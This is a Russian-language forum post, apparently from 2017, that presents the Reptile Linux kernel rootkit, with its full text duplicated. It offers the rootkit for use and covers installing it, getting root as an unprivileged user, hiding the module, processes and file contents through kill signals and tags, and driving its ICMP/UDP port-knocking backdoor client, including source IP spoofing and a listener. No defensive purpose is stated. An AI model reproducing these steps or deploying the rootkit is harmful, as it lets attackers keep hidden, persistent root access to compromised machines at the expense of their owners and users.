Vander
29.10.2017, 00:34
Приветствую! В этой статье, речь пойдет о rootkit для Linux систем, под именем Reptile.
https://forum.antichat.xyz/attachments/4787078/img_ec31aa387f.png
Rootkit — набор программных средств, обеспечивающих:
· маскировку объектов (процессов, файлов, директорий, драйверов);
· управление (событиями, происходящими в системе);
· сбор данных (параметров системы).
Особенности Reptile:
· Root-права не привилегированным пользователям
· Сокрытие файлов и каталогов
· Сокрытие содержимого файлов
· Сокрытие процессов
· Собственная маскировка
· Сохранение загрузок
· ICMP / UDP port-knocking backdoor.
Установка:
> apt-get install linux-headers-$(uname -r)
https://forum.antichat.xyz/attachments/4787078/img_8bef064885.png
> https://github.com/f0rb1dd3n/Reptile.git
> cd Reptile
> ./installer.sh install
https://forum.antichat.xyz/attachments/4787078/img_b2f5184e7a.png
Бинарные файлы будут скопированы в папку /reptile, которая будет скрыта с помощью Reptile.
Получение rootправ:
> /reptile/r00t
> Id
https://forum.antichat.xyz/attachments/4787078/img_a0556b6e8c.png
Использовалась следующая ОС:
https://forum.antichat.xyz/attachments/4787078/img_20dbb746b5.png
Скрытность Рептилии:
· Скрыть / показать модуль: kill -50 0
· Скрыть / показать процесс: kill -49
· Скрыть содержимое файлов: весь контент между тегами будет скрыт.
https://forum.antichat.xyz/attachments/4787078/img_2bd6b2c095.png
> #
> content to hide
> #
Port Knocking к хосту с Рептилией:
> ./knock_on_heaven
Аргументы:
· -x protocol (ICMP/UDP)
· -s Source IP address (You can spoof)
· -t Target IP address
· -p Source Port
· -q Target Port
· -d Data to knock on backdoor: " "
· -l Launch listener
Конец, спасибо за внимание.
P.S. Дополнительная информация:
>https://github.com/f0rb1dd3n/Reptile
Спасибо, за внимание.
https://forum.antichat.xyz/attachments/4787078/img_ec31aa387f.png
Rootkit — набор программных средств, обеспечивающих:
· маскировку объектов (процессов, файлов, директорий, драйверов);
· управление (событиями, происходящими в системе);
· сбор данных (параметров системы).
Особенности Reptile:
· Root-права не привилегированным пользователям
· Сокрытие файлов и каталогов
· Сокрытие содержимого файлов
· Сокрытие процессов
· Собственная маскировка
· Сохранение загрузок
· ICMP / UDP port-knocking backdoor.
Установка:
> apt-get install linux-headers-$(uname -r)
https://forum.antichat.xyz/attachments/4787078/img_8bef064885.png
> https://github.com/f0rb1dd3n/Reptile.git
> cd Reptile
> ./installer.sh install
https://forum.antichat.xyz/attachments/4787078/img_b2f5184e7a.png
Бинарные файлы будут скопированы в папку /reptile, которая будет скрыта с помощью Reptile.
Получение rootправ:
> /reptile/r00t
> Id
https://forum.antichat.xyz/attachments/4787078/img_a0556b6e8c.png
Использовалась следующая ОС:
https://forum.antichat.xyz/attachments/4787078/img_20dbb746b5.png
Скрытность Рептилии:
· Скрыть / показать модуль: kill -50 0
· Скрыть / показать процесс: kill -49
· Скрыть содержимое файлов: весь контент между тегами будет скрыт.
https://forum.antichat.xyz/attachments/4787078/img_2bd6b2c095.png
> #
> content to hide
> #
Port Knocking к хосту с Рептилией:
> ./knock_on_heaven
Аргументы:
· -x protocol (ICMP/UDP)
· -s Source IP address (You can spoof)
· -t Target IP address
· -p Source Port
· -q Target Port
· -d Data to knock on backdoor: " "
· -l Launch listener
Конец, спасибо за внимание.
P.S. Дополнительная информация:
>https://github.com/f0rb1dd3n/Reptile
Спасибо, за внимание.